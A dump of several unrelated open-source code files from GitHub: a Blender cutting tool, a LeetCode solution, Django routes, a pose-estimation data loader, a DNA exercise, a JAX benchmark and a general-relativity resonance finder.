self.points:\n return mouse_co\n\n if len(self.points) == 2:\n u = self.points[1] - self.points[0]\n u = u.yx\n u.x *= -1\n\n ortho_vecs = [u]\n\n else:\n ortho_vecs = self.ortho_vecs\n\n vec = mouse_co - self.points[0]\n return max((vec.project(orth) for orth in ortho_vecs), key=lambda v: v.dot(vec)) + self.points[0]\n\n def on_click(self, mouse_co):\n self.points.append(mouse_co)\n\n if len(self.points) == 3:\n self.done = True\n\n def on_wheel(self, dir):\n self.resolution += dir\n self.resolution = max(self.resolution, 1)\n\n def ellipse_points(self, mouse_co):\n n = len(self.points)\n if 1 <= n <= 3:\n if n == 1:\n u = mouse_co - self.points[0]\n v = u.yx\n v.x *= -1\n\n elif n == 2:\n u = self.points[1] - self.points[0]\n v = (mouse_co - self.points[0])\n\n elif n == 3:\n u = self.points[1] - self.points[0]\n v = self.points[2] - self.points[0]\n\n for i in range(self.resolution):\n a = (i * 2 * pi) / self.resolution\n\n yield u * sin(a) + v * cos(a) + self.points[0]\n\n def undo(self, mouse_co):\n if self.points:\n self.points.pop(-1)\n\n def draw(self, draw_2d, mouse_co):\n\n ellipse = list(self.ellipse_points(mouse_co))\n\n draw_2d.add_line_loop(ellipse, BLACK, cyclic=True)\n\n n = len(self.points)\n\n if n >= 1:\n draw_2d.add_circle(self.points[0], 3, 16, RED)\n\n if n >= 2:\n draw_2d.add_circle(self.points[1], 3, 16, GREEN)\n\n if n >= 3:\n draw_2d.add_circle(self.points[2], 3, 16, BLUE)\n\n if n < 3:\n mouse_color = (RED, GREEN, BLUE)[n]\n draw_2d.add_circle(mouse_co, 3, 16, mouse_color)\n\n\nclass RectangleCut(SlashToolBase):\n\n def rectangle_points(self, a, b):\n x_min = min(a.x, b.x)\n x_max = max(a.x, b.x)\n y_min = min(a.y, b.y)\n y_max = max(a.y, b.y)\n\n return [Vector((x_min, y_min)), Vector((x_max, y_min)),\n Vector((x_max, y_max)), Vector((x_min, y_max))]\n\n def on_click(self, mouse_co):\n self.points.append(mouse_co)\n\n if len(self.points) == 2:\n self.done = True\n\n def undo(self, mouse_co):\n if self.points:\n self.points.pop(-1)\n\n def draw(self, draw_2d, mouse_co):\n\n n = len(self.points)\n\n if n == 0:\n draw_2d.add_circle(mouse_co, 3, 16, RED)\n points = None\n\n elif n == 1:\n draw_2d.add_circle(self.points[0], 3, 16, RED)\n draw_2d.add_circle(mouse_co, 3, 16, GREEN)\n points = self.rectangle_points(self.points[0], mouse_co)\n\n elif n == 2:\n draw_2d.add_circle(self.points[0], 3, 16, RED)\n draw_2d.add_circle(self.points[1], 3, 16, GREEN)\n points = self.rectangle_points(self.points[0], self.points[1])\n\n if points:\n draw_2d.add_line_loop(points, BLACK, cyclic=True)\n\n def cut(self, context, thickness=0.0001):\n cut(context, self.rectangle_points(\n self.points[0], self.points[1]), thickness, 50, cyclic=True)\n\n\n\nclass SplineCut(SlashToolBase):\n\n resolution = 10\n confirm_dist = 10\n\n def on_click(self, mouse_co):\n if self.points:\n d = (self.points[-1] - mouse_co).length\n d1 = (self.points[0] - mouse_co).length\n\n if min(d, d1) < self.confirm_dist:\n self.done = True\n if d1 < d:\n self.cyclic = True\n\n else:\n self.cyclic = False\n return\n\n self.points.append(mouse_co)\n\n def on_enter(self, mouse_co):\n self.points.append(mouse_co)\n self.done = True\n\n def on_wheel(self, dir):\n self.resolution += dir\n self.resolution = max(self.resolution, 1)\n\n def spline_points(self, points, resolution, cyclic=False):\n\n if len(points) <= 2:\n return points\n\n if cyclic:\n points = [points[-1], *points, points[0], points[1]]\n\n controll_points = self.auto_bezier_control_points(points)\n new_points = []\n\n for i in range(len(controll_points) // 3):\n i *= 3\n for p in bezier_curve_points(*controll_points[i:i + 4], resolution):\n new_points.append(p)\n\n\n if cyclic:\n new_points = new_points[resolution: -resolution]\n\n else:\n new_points.append(controll_points[-1])\n\n\n return new_points\n\n def auto_bezier_control_points(self, points):\n\n if len(points) < 3:\n return points\n\n new_points = [points[0], points[0]]\n\n for i in range(len(points) - 2):\n i += 1\n\n da = points[i - 1] - points[i]\n db = points[i + 1] - points[i]\n n = da.normalized() + db.normalized()\n if n.length_squared == 0:\n n = da.yx\n n.x *= -1\n\n da -= da.project(n)\n db -= db.project(n)\n\n new_points.append(da * 0.42 + points[i])\n new_points.append(points[i])\n new_points.append(db * 0.42 + points[i])\n\n new_points.append(points[-1])\n new_points.append(points[-1])\n return new_points\n\n def draw(self, draw_2d, mouse_co):\n\n d = float('inf')\n d1 = float('inf')\n if self.points:\n d = (self.points[-1] - mouse_co).length\n d1 = (self.points[0] - mouse_co).length\n\n if d1 < d and d1 < self.confirm_dist:\n self.cyclic = True\n else:\n self.cyclic = False\n\n draw_2d.add_circle(self.points[0], self.confirm_dist, 16, GREEN)\n draw_2d.add_circle(self.points[-1], self.confirm_dist, 16, RED)\n\n if min(d, d1) < self.confirm_dist:\n draw_2d.add_text('click to cut', mouse_co + Vector((10, 10)), color=RED, size=20)\n\n if min(d, d1) < self.confirm_dist:\n points = self.spline_points(self.points, self.resolution, self.cyclic)\n else:\n points = self.spline_points(self.points + [mouse_co], self.resolution, self.cyclic)\n\n draw_2d.add_line_loop(points, BLACK, self.cyclic)\n\n for point in self.points:\n draw_2d.add_circle(point, 3, 16, RED)\n\n draw_2d.add_circle(mouse_co, 3, 16, GREEN)\n\n def undo(self, mouse_co):\n if self.points:\n self.points.pop(-1)\n\n def cut(self, context, thickness=0.0001):\n cut(context, self.spline_points(self.points, self.resolution, self.cyclic), thickness, 50, self.cyclic)\n\nlast_tool = PolyCut\n\n@topbar_mt_app_system_add\n@register_class\nclass SlashCutter(InteractiveOperator):\n bl_idname = 'sculpt_tool_kit.slash'\n bl_label = 'Slash Cutter'\n\n\n def loop(self, context):\n global last_tool\n tool = last_tool()\n\n while True:\n event = yield {'RUNNING_MODAL'}\n self.draw_2d.clear()\n\n\n if event.ctrl:\n mouse_co = tool.ortho_project(self.mouse_co)\n tool.orthogonal = True\n else:\n mouse_co = self.mouse_co\n tool.orthogonal = False\n\n if not self.wheel == 0:\n tool.on_wheel(self.wheel)\n\n if event.type == 'D':\n tool = PolyCut()\n last_tool = PolyCut\n\n elif event.type == 'E':\n tool = EllipseCut()\n last_tool = EllipseCut\n\n elif event.type == 'S':\n tool = SplineCut()\n last_tool = SplineCut\n\n elif event.type == 'R':\n tool = RectangleCut()\n last_tool = RectangleCut\n\n elif event.type == 'PAGE_UP' and event.value == 'PRESS':\n tool.on_wheel(1)\n\n elif event.type == 'PAGE_DOWN' and event.value == 'PRESS':\n tool.on_wheel(-1)\n\n elif event.type == 'LEFTMOUSE' and event.value == 'PRESS':\n tool.on_click(mouse_co)\n\n elif event.type == 'Z' and event.ctrl and event.value == \"PRESS\":\n tool.undo(mouse_co)\n\n elif event.type == 'MOUSEMOVE' and self.lmb:\n tool.on_drag(mouse_co)\n\n elif event.type == 'MOUSEMOVE':\n tool.on_mousemove(mouse_co)\n\n elif event.type == 'RET':\n tool.on_enter(mouse_co)\n\n elif event.type == 'G' and event.value == 'PRESS':\n grab_mode = tool.grab_mode(mouse_co)\n next(grab_mode)\n while True:\n grab_mode.send(self.mouse_co)\n self.draw_2d.clear()\n tool.draw(self.draw_2d, mouse_co)\n\n event = yield {'RUNNING_MODAL'}\n mouse_co = self.mouse_co\n if event.type == 'RET' or self.lmb:\n break\n\n elif event.type == 'ESC':\n return {'CANCELLED'}\n\n help_text = f'''\n Current tool: {tool.__class__.__name__}\n D: PolyCut, E: EllipseCut, S: SplineCut, R: RectangleCut\n orthogonal mode (ctrl): {'enabled' if tool.orthogonal else 'disabled'}\n undo: (ctrl + Z)\n change resolution: wheel +/-\n '''\n\n for i, line in enumerate(reversed(help_text.split('\\n'))):\n self.draw_2d.add_text(line, Vector((10, i*25)), 20, Vector((0.9, 0.8, 0, 1)))\n\n tool.update()\n tool.draw(self.draw_2d, mouse_co)\n\n if tool.done:\n tool.cut(context)\n return {'FINISHED'}\n","repo_name":"jeacom25b/sculptkt-for-2-8","sub_path":"slash_cut.py","file_name":"slash_cut.py","file_ext":"py","file_size_in_byte":16030,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"40526983937","text":"#\n# [199] Binary Tree Right Side View\n#\n# https://leetcode.com/problems/binary-tree-right-side-view/description/\n#\n# algorithms\n# Medium (44.05%)\n# Total Accepted: 122.9K\n# Total Submissions: 279K\n# Testcase Example: '[1,2,3,null,5,null,4]'\n#\n# Given a binary tree, imagine yourself standing on the right side of it,\n# return the values of the nodes you can see ordered from top to bottom.\n# \n# Example:\n# \n# \n# Input: [1,2,3,null,5,null,4]\n# Output: [1, 3, 4]\n# Explanation:\n# \n# ⁠ 1 <---\n# ⁠/ \\\n# 2 3 <---\n# ⁠\\ \\\n# ⁠ 5 4 <---\n# \n# \n#\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def rightSideView(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n if root == None:\n \treturn []\n queue = [(root, 0)]\n series = []\n while queue != []:\n \thead = queue[0]\n \tseries.append(head)\n \tqueue.pop(0)\n \tif head[0].right != None:\n \t\tqueue.append((head[0].right, head[1] + 1))\n \tif head[0].left != None:\n \t\tqueue.append((head[0].left, head[1] + 1))\n ans = []\n level = 0\n for tup in series:\n \tif tup[1] == level:\n \t\tans.append(tup[0].val)\n \t\tlevel += 1\n \telse:\n \t\tcontinue\n return ans\n\n \n","repo_name":"Zihua-Liu/LeetCode","sub_path":"199/199.binary-tree-right-side-view.python3.py","file_name":"199.binary-tree-right-side-view.python3.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33521139777","text":"\"\"\"CMS urls.\"\"\"\nfrom django.urls import path\nfrom . import views\n\napp_name = 'cms'\n\nurlpatterns = [\n\n path(\n '',\n views.ImageCreate.as_view(),\n name='home'\n ),\n path(\n '/',\n views.ImageDetailView.as_view(),\n name='image-detail'\n ),\n path(\n '/export/xls/',\n views.export_results_xls,\n name='export_results_xls',\n ),\n\n]\n","repo_name":"vinsmokemau/OCR","sub_path":"cms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36892145677","text":"\"\"\"\n@author: Jianan Zhen\n@contact: jnzhen99@163.com\n\"\"\"\nimport copy\nimport cv2\nimport json\nimport numpy as np\nimport os.path as osp\nimport torch\nfrom torch.utils.data import Dataset\n\nfrom dataset.ImageAugmentation import (aug_croppad, aug_flip, aug_rotate, aug_scale)\nfrom dataset.representation import generate_heatmap, generate_paf, generate_rdepth\n\n\nclass JointDataset(Dataset):\n def __init__(self, cfg, stage, transform=None, with_augmentation=False, with_mds=False):\n self.stage = stage\n \"\"\"\n train: provide training data for training\n test: provide test data for test\n generation: provide training data for inference --> the input to RefineNet\n \"\"\"\n assert self.stage in ('train', 'test', 'generation')\n\n self.transform = transform\n\n self.train_data = list()\n self.val_data = list()\n DATASET = cfg.dataset\n if self.stage == 'train':\n # choose coco + specific 3d dataset for training together\n with open(DATASET.COCO_JSON_PATH) as data_file:\n data_this = json.load(data_file)\n data = data_this['root']\n for data_name in DATASET.USED_3D_DATASETS: # 'MUCO', 'CMUP', 'H36M'\n with open(eval('DATASET.%s_JSON_PATH'%(data_name))) as data_file:\n data_this = json.load(data_file)\n data = data_this['root'] + data\n elif self.stage == 'generation':\n data = []\n for data_name in DATASET.USED_3D_DATASETS: \n with open(eval('DATASET.%s_JSON_PATH'%(data_name))) as data_file:\n data_this = json.load(data_file)\n data = data_this['root'] + data\n else:\n with open(cfg.TEST.JSON_PATH) as data_file:\n data_this = json.load(data_file)\n data = data_this['root']\n\n for i in range(len(data)):\n if data[i]['isValidation'] != 0:\n self.val_data.append(data[i])\n else:\n self.train_data.append(data[i])\n\n self.input_shape = DATASET.INPUT_SHAPE\n self.output_shape = DATASET.OUTPUT_SHAPE\n self.stride = DATASET.STRIDE\n\n # data root path\n self.test_root_path = cfg.TEST.ROOT_PATH\n self.root_path = {}\n for dname in (['COCO'] + DATASET.USED_3D_DATASETS): # 'MUCO', 'CMUP', 'H36M'\n self.root_path[dname] = eval('DATASET.%s_ROOT_PATH'%(dname))\n\n # keypoints information\n self.root_idx = DATASET.ROOT_IDX\n self.keypoint_num = DATASET.KEYPOINT.NUM\n self.gaussian_kernels = DATASET.TRAIN.GAUSSIAN_KERNELS\n self.paf_num = DATASET.PAF.NUM\n self.paf_vector = DATASET.PAF.VECTOR\n self.paf_thre = DATASET.PAF.LINE_WIDTH_THRE\n\n # augmentation information\n self.with_augmentation = with_augmentation\n self.params_transform = dict()\n self.params_transform['crop_size_x'] = DATASET.INPUT_SHAPE[1]\n self.params_transform['crop_size_y'] = DATASET.INPUT_SHAPE[0]\n self.params_transform['center_perterb_max'] = DATASET.TRAIN.CENTER_TRANS_MAX\n self.params_transform['max_rotate_degree'] = DATASET.TRAIN.ROTATE_MAX\n self.params_transform['flip_prob'] = DATASET.TRAIN.FLIP_PROB\n self.params_transform['flip_order'] = DATASET.KEYPOINT.FLIP_ORDER\n self.params_transform['stride'] = DATASET.STRIDE\n self.params_transform['scale_max'] = DATASET.TRAIN.SCALE_MAX\n self.params_transform['scale_min'] = DATASET.TRAIN.SCALE_MIN\n\n self.with_mds = with_mds\n self.max_people = cfg.DATASET.MAX_PEOPLE\n\n def __len__(self):\n if self.stage == 'train' or self.stage == 'generation':\n return len(self.train_data)\n else: # 'test'\n return len(self.val_data)\n\n def get_anno(self, meta_data):\n anno = dict()\n anno['dataset'] = meta_data['dataset'].upper()\n anno['img_height'] = int(meta_data['img_height'])\n anno['img_width'] = int(meta_data['img_width'])\n\n anno['isValidation'] = meta_data['isValidation']\n anno['bodys'] = np.asarray(meta_data['bodys'])\n anno['center'] = np.array([anno['img_width']//2, anno['img_height']//2])\n return anno\n\n def remove_illegal_joint(self, meta):\n crop_x = int(self.params_transform['crop_size_x'])\n crop_y = int(self.params_transform['crop_size_y'])\n for i in range(len(meta['bodys'])):\n mask_ = np.logical_or.reduce((meta['bodys'][i][:, 0] >= crop_x,\n meta['bodys'][i][:, 0] < 0,\n meta['bodys'][i][:, 1] >= crop_y,\n meta['bodys'][i][:, 1] < 0))\n\n meta['bodys'][i][mask_ == True, 3] = 0\n return meta\n\n def __getitem__(self, index):\n if self.stage == 'train' or self.stage == 'generation':\n data = copy.deepcopy(self.train_data[index])\n else:\n data = copy.deepcopy(self.val_data[index])\n\n meta_data = self.get_anno(data)\n\n if self.stage not in ['train', 'generation']:\n root_path = self.test_root_path\n else:\n root_path = self.root_path[meta_data['dataset']]\n\n img = cv2.imread(osp.join(root_path, data['img_paths']), cv2.IMREAD_COLOR)\n\n if self.with_augmentation:\n meta_data, img = aug_rotate(meta_data, img, self.params_transform)\n else:\n self.params_transform['center_perterb_max'] = 0\n\n if meta_data['dataset'] == 'COCO':\n meta_data, img = aug_croppad(meta_data, img, self.params_transform, self.with_augmentation)\n else:\n meta_data, img = aug_croppad(meta_data, img, self.params_transform, False)\n\n if self.with_augmentation:\n meta_data, img = aug_flip(meta_data, img, self.params_transform)\n\n meta_data = self.remove_illegal_joint(meta_data)\n\n if self.transform:\n img = self.transform(img)\n else:\n img = img.transpose((2, 0, 1)).astype(np.float32)\n img = torch.from_numpy(img).float()\n \n if self.stage in ['test', 'generation']:\n bodys = np.zeros((self.max_people, self.keypoint_num, len(meta_data['bodys'][0][0])), np.float)\n bodys[:len(meta_data['bodys'])] = np.asarray(meta_data['bodys'])\n img_path = data['img_paths']\n return img, torch.from_numpy(bodys).float(), img_path, {'scale': meta_data['scale'],\n 'img_width': meta_data['img_width'],\n 'img_height': meta_data['img_height'],\n 'net_width': self.params_transform['crop_size_x'],\n 'net_height': self.params_transform['crop_size_y']}\n # generate labels\n valid = np.ones((self.keypoint_num + self.paf_num*3, 1), np.float)\n if meta_data['dataset'] == 'COCO':\n # coco has no headtop annotation\n valid[1, 0] = 0 \n # pafs of headtop and neck\n valid[self.keypoint_num, 0] = 0 \n valid[self.keypoint_num+1, 0] = 0\n # relative depth\n valid[self.keypoint_num + self.paf_num*2:, 0] = 0\n\n labels_num = len(self.gaussian_kernels)\n labels = np.zeros((labels_num, self.keypoint_num + self.paf_num*3, *self.output_shape))\n for i in range(labels_num):\n # heatmaps\n labels[i][:self.keypoint_num] = generate_heatmap(meta_data['bodys'], self.output_shape, self.stride, \\\n self.keypoint_num, kernel=self.gaussian_kernels[i])\n # pafs + relative depth\n labels[i][self.keypoint_num:] = generate_paf(meta_data['bodys'], self.output_shape, self.params_transform, \\\n self.paf_num, self.paf_vector, max(1, (3-i))*self.paf_thre, self.with_mds)\n # root depth\n labels_rdepth = generate_rdepth(meta_data, self.stride, self.root_idx, self.max_people)\n \n labels = torch.from_numpy(labels).float()\n labels_rdepth = torch.from_numpy(labels_rdepth).float()\n valid = torch.from_numpy(valid).float()\n\n return img, valid, labels, labels_rdepth\n\n\n\n\n\n\n\n\n","repo_name":"zju3dv/SMAP","sub_path":"dataset/base_dataset.py","file_name":"base_dataset.py","file_ext":"py","file_size_in_byte":8504,"program_lang":"python","lang":"en","doc_type":"code","stars":236,"dataset":"github-code","pt":"35"} +{"seq_id":"33846320435","text":"def hamming(codon1, codon2):\n '''\n >>> hamming('TTCAT', 'TTCAT')\n 0\n >>> hamming('TTCAT', 'TTGAT')\n 1\n >>> hamming('TTCAT', 'GAGGA')\n 5\n >>> hamming('TTCAT', 'TTT')\n Traceback (most recent call last):\n AssertionError: strings should have equal length\n '''\n count = 0\n if len(codon1) == len(codon2):\n for i in range(len(codon1)):\n if codon1[i] != codon2[i]:\n count += 1\n return count\n raise AssertionError('strings should have equal length')\ndef complement(codon):\n '''\n >>> complement('TTCAT')\n 'ATGAA'\n >>> complement('TTGAT')\n 'ATCAA'\n >>> complement('GAGGA')\n 'TCCTC'\n '''\n complementList = []\n reverse = codon[::-1]\n for code in reverse:\n if code == 'A':\n complementList.append('T')\n if code == 'G':\n complementList.append('C')\n if code == 'T':\n complementList.append('A')\n if code == 'C':\n complementList.append('G')\n return ''.join(complementList)\n\ndef normalform(codon):\n '''\n >>> normalform('TTCAT')\n 'ATGAA'\n >>> normalform('TTGAT')\n 'ATCAA'\n >>> normalform('GAGGA')\n 'GAGGA'\n '''\n if sorted(codon) == codon:\n return complement(codon)\n else:\n return codon\n\ndef occurrences(reads):\n '''\n >>> reads = ['TCATC', 'TTCAT', 'TCATC', 'TGAAA', 'GAGGA', 'TTTCA', 'ATCAA', 'TTGAT', 'AGGCT']\n >>> occurrences(reads)\n {'GAGGA': 1, 'ATGAA': 1, 'TGAAA': 2, 'GATGA': 2, 'AGCCT': 1, 'ATCAA': 2}\n >>> reads = ['GATTA', 'GATTA', 'TAATC', 'GAATC', 'GATTA', 'TAAGC', 'TAATA']\n >>> occurrences(reads)\n {'GATTA': 4, 'TAATA': 1, 'GCTTA': 1, 'GAATC': 1}\n '''\n\ndef errors(reads):\n '''\n >>> reads = ['TCATC', 'TTCAT', 'TCATC', 'TGAAA', 'GAGGA', 'TTTCA', 'ATCAA', 'TTGAT', 'AGGCT']\n >>> errors(reads)\n ({'AGGCT'}, [('GAGGA', 'GATGA'), ('TTCAT', 'TTGAT')])\n >>> reads = ['GATTA', 'GATTA', 'TAATC', 'GAATC', 'GATTA', 'TAAGC', 'TAATA']\n >>> errors(reads)\n (set(), [('GAATC', 'TAATC'), ('TAAGC', 'TAATC'), ('TAATA', 'TAATC')])\n '''","repo_name":"isk02206/python","sub_path":"informatics/BA_1 2017-2018/exam prep/Error correction in reads.py","file_name":"Error correction in reads.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29898694410","text":"import os\n\nimport haliax as hax\nimport jax\nimport jax.numpy as jnp\nimport jax.random as jax_rand\nfrom haliax import NamedArray\nfrom jax.nn import one_hot\nfrom jax.sharding import Mesh\nfrom jax_smi import initialise_tracking\nfrom optax import softmax_cross_entropy\nfrom tqdm import tqdm\n\nimport src.data.transforms as T\nfrom src.data.loader import DLConfig, SSV2\nfrom src.model.lq import LQViTConfig, LQViT\n\ncompute_axis_mapping = {'batch': 'data'}\nparam_axis_mapping = {'embed': 'data'}\nmesh = Mesh(jax.local_devices(backend='tpu'), 'data')\n\n\nTRAIN_AUG = T.Sequential([\n T.TrivialAugment(),\n T.Normalize().astype(jnp.bfloat16),\n])\n\n@jax.jit\ndef collate_put(cls, vid):\n cls = hax.named(jnp.stack(cls), 'batch')\n vid = hax.named(jnp.stack(vid), ('batch', 'temporal', 'channels', 'height', 'width'))\n with mesh:\n cls = hax.shard_with_axis_mapping(cls, compute_axis_mapping)\n vid = hax.shard_with_axis_mapping(vid, compute_axis_mapping)\n return cls, vid\n\n\n@hax.named_jit(donate_args=(False, True, True))\ndef cross_entropy(model: LQViT, targets: NamedArray, x: NamedArray, *, key, num_classes: 174) -> NamedArray:\n with hax.axis_mapping(compute_axis_mapping):\n raw_logits = model(x, key=key)\n targets = targets.astype(jnp.int32)\n return softmax_cross_entropy(\n raw_logits.array,\n one_hot(targets.array, num_classes)\n ).mean()\n\n\nkey = jax_rand.PRNGKey(0)\n\nm_cfg = LQViTConfig(n_classes=174)\nmodel = hax.shard_with_axis_mapping(\n LQViT.init(m_cfg, key=key).astype(jnp.bfloat16),\n param_axis_mapping,\n mesh=mesh,\n)\n\nconfig = DLConfig(\n data_loc='gs://redunmin',\n collate_put=collate_put,\n transforms={\n 'train': TRAIN_AUG\n },\n batch_size=32,\n)\nloader = SSV2(config, key=key)\nloader.setup('train')\ninitialise_tracking()\nlog_path = f'{os.environ[\"HOME\"]}/tmp/tensorboard'\nos.makedirs(log_path, exist_ok=True)\nwith jax.profiler.trace(log_path):\n for i, x in enumerate(tqdm(loader.train_dataloader())):\n with mesh:\n jax.block_until_ready(cross_entropy(model, x[0], x[1], key=key, num_classes=174))\n #jax.block_until_ready(x)\n","repo_name":"leifu1128/RedunMin","sub_path":"tests/ssv2_bench.py","file_name":"ssv2_bench.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71085164262","text":"\nfrom re import M\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.optimize as opt\nfrom sympy import Point, Line\nfrom scipy import interpolate\nimport sys\nfrom gr_wrapper import ckerr_minverse, ckerr_minv2omega, ckerr_eql2j, ckerr_j2eql\nimport os \nimport math\n\n\n\n\n\"\"\"\nHello!\n\nAfter you simulate all the orbits and put them in a file,\nwe use this code to generate a list of all potential resonances\nfor delta_J to determine the strength of.\n\nInputs: mu_inner, mu_outer, M, astar, file counter\n\nOutputs (by column): resonance counter, file counter, \nresonance time, omega_inner_dot, omega_outer_dot, \nmu_inner, mu_outer, gamma, m, n_inner, k_inner, n_outer, \nk_outer, J_r_inner, J_theta_inner, J_phi_inner, J_r_outer, \nJ_theta_outer, J_phi_outer, inner inclination, inner periapse, \ninner apoapse, outer inclination, outer periapse, outer apoapse\n\"\"\"\n\n\n\n#Note that in the paper, we chose 0.00001, 0.00001, 1, 0.9, and ran over 50 files\nprint(\"Enter the EMRI body's mass:\")\nmu_inner = 0.00001 #float(input())\nprint(\"Enter the perturber's mass:\")\nmu_outer = 0.00001 #float(input())\nprint(\"Enter the SMBH mass:\")\nM = 1 #float(input())\nprint(\"Enter the spin parameter:\")\nastar = 0.9 #float(input())\nprint(\"Enter the number of inner/outer body file pairs:\")\nfile_amount = 50 #float(input())\n\n\n\n#Starting the runs\nnumber = 0\nfor file_number in range(file_amount):\n\n #Importing all the info from the files. Feel free to change this depending on the files you made\n #Also note how we use label, because there will (very likely) always be less points in outer than inner.\n _, time_value_1, J_r_inner_list, J_theta_inner_list, J_phi_inner_list, om_inner_r_list, om_inner_theta_list, om_inner_phi_list, delta_t_list_inner = np.loadtxt(\"inner_body_runs/J_evolve_inner_\" + str(file_number+1) + \".txt\", unpack=True)\n label, time_value_2, J_r_outer_list, J_theta_outer_list, J_phi_outer_list, om_outer_r_list, om_outer_theta_list, om_outer_phi_list, delta_t_list_outer = np.loadtxt(\"outer_body_runs/J_evolv_outer_\" + str(file_number+1) + \".txt\", unpack=True) \n \n #Interpolation of J values\n J_inner_r_function = interpolate.interp1d(time_value_1, J_r_inner_list, kind='linear')\n J_inner_theta_function = interpolate.interp1d(time_value_1, J_theta_inner_list, kind='linear')\n J_inner_phi_function = interpolate.interp1d(time_value_1, J_phi_inner_list, kind='linear')\n J_outer_r_function = interpolate.interp1d(time_value_2, J_r_outer_list, kind='linear')\n J_outer_theta_function = interpolate.interp1d(time_value_2, J_theta_outer_list, kind='linear')\n J_outer_phi_function = interpolate.interp1d(time_value_2, J_phi_outer_list, kind='linear')\n\n #Interpolation of omega values\n om_inner_r_function = interpolate.interp1d(time_value_1, om_inner_r_list, kind='linear')\n om_inner_theta_function = interpolate.interp1d(time_value_1, om_inner_theta_list, kind='linear')\n om_inner_phi_function = interpolate.interp1d(time_value_1, om_inner_phi_list, kind='linear')\n om_outer_r_function = interpolate.interp1d(time_value_2, om_outer_r_list, kind='linear')\n om_outer_theta_function = interpolate.interp1d(time_value_2, om_outer_theta_list, kind='linear')\n om_outer_phi_function = interpolate.interp1d(time_value_2, om_outer_phi_list, kind='linear')\n\n #Setting up time axis. Note that since the inner body will (usually) run to less than the outer body, so we use its timescale.\n #Also, if any inner files goes to less than 100000, feel free to adjust this accordingly.\n t = np.linspace(1, time_value_1[-1], 100000)\n\n #Composing A values (which are)\n A_inner_r_list = []\n A_inner_theta_list = []\n A_outer_r_list = []\n A_outer_theta_list = []\n\n res_timing = []\n\n i = 0\n for i in range(len(t)):\n\n A_inner_r_list.append(om_inner_r_function(t[i])/(om_inner_phi_function(t[i])-om_outer_phi_function(t[i])))\n A_inner_theta_list.append(om_inner_theta_function(t[i])/(om_inner_phi_function(t[i])-om_outer_phi_function(t[i])))\n A_outer_r_list.append(om_outer_r_function(t[i])/(om_inner_phi_function(t[i])-om_outer_phi_function(t[i])))\n A_outer_theta_list.append(om_outer_theta_function(t[i])/(om_inner_phi_function(t[i])-om_outer_phi_function(t[i])))\n \n \n #Now we start the big check\n label.tolist()\n [int(num) for num in label]\n #Note (for the paper and in general) we chose to range between -5 and 5 bc anything greater, we found, was insignificant \n for n_inner in range(-5,5): \n for n_outer in range(-5,5):\n for k_inner in range(-5,5):\n for k_outer in range(-5,5):\n\n #Selection rule\n if abs(k_inner - k_outer) == 2:\n #Calculating potential m's\n m = []\n for j in range(len(A_inner_r_list)):\n m.append(-n_inner*A_inner_r_list[j]-k_inner*A_inner_theta_list[j]+n_outer*A_outer_r_list[j]+k_outer*A_outer_theta_list[j])\n\n #Finding where there is a resonance crossing\n for i in range(len(m)-1):\n if math.floor(m[i+1]) != math.floor(m[i]):\n if abs(m[i])<=2:\n if t[i] != 1.0:\n time_value_resonance = t[i]\n\n #Final calculation and print out\n for index in range(len(label)-1):\n if time_value_1[index] < time_value_resonance and time_value_1[index+1] > time_value_resonance:\n \n omega_inner_after = om_inner_r_list[index+1]*n_inner + om_inner_theta_list[index+1]*k_inner + om_inner_phi_list[index+1]*(math.floor(m[i+1]))\n omega_inner_before = om_inner_r_list[index]*n_inner + om_inner_theta_list[index]*k_inner + om_inner_phi_list[index]*(math.floor(m[i+1]))\n delta_t_inner = delta_t_list_inner[index+1]\n omega_inner_dot = (omega_inner_after-omega_inner_before)/delta_t_inner\n\n omega_outer_after = om_outer_r_list[index+1]*n_outer + om_outer_theta_list[index+1]*k_outer + om_outer_phi_list[index+1]*(math.floor(m[i+1]))\n omega_outer_before = om_outer_r_list[index]*n_outer + om_outer_theta_list[index]*k_outer + om_outer_phi_list[index]*(math.floor(m[i+1]))\n delta_t_outer = delta_t_list_outer[index+1]\n omega_outer_dot = (omega_outer_after-omega_outer_before)/delta_t_outer\n\n gamma = mu_inner*omega_inner_dot-mu_outer*omega_outer_dot\n\n J_inner = [J_inner_r_function(t[i]), J_inner_theta_function(t[i]), J_inner_phi_function(t[i])]\n J_outer = [J_outer_r_function(t[i]), J_outer_theta_function(t[i]), J_outer_phi_function(t[i])]\n\n _, EQL_outer = ckerr_j2eql(J_outer, M, astar)\n _, EQL_inner = ckerr_j2eql(J_inner, M, astar)\n\n _, _, anc_outer = ckerr_eql2j(list(EQL_outer), M, astar)\n _, _, anc_inner = ckerr_eql2j(list(EQL_inner), M, astar)\n\n number = number + 1\n\n print(number, file_number + 1, t[i], omega_inner_dot, omega_outer_dot, mu_inner, mu_outer, gamma, math.floor(m[i+1]), n_inner, k_inner, n_outer, k_outer, J_inner[0], J_inner[1], J_inner[2], J_outer[0], J_outer[1], J_outer[2], anc_inner[0], anc_inner[1], anc_inner[2], anc_outer[0], anc_outer[1], anc_outer[2])\n \n \n\n \n","repo_name":"hirata10/gr-resonance-tools","sub_path":"resfinder.py","file_name":"resfinder.py","file_ext":"py","file_size_in_byte":8126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1577997810","text":"import collections\nimport signal\nfrom datetime import timedelta\n\nimport psutil\nimport pymongo\n\nimport core4.queue.job\nimport core4.queue.process\nimport core4.queue.query\nimport core4.service.introspect.main\nimport core4.util.node\nfrom core4.queue.daemon import CoreDaemon\nfrom core4.service.introspect.command import EXECUTE\n\n#: processing steps in the main loop of :class:`.CoreWorker`\nSTEPS = (\n 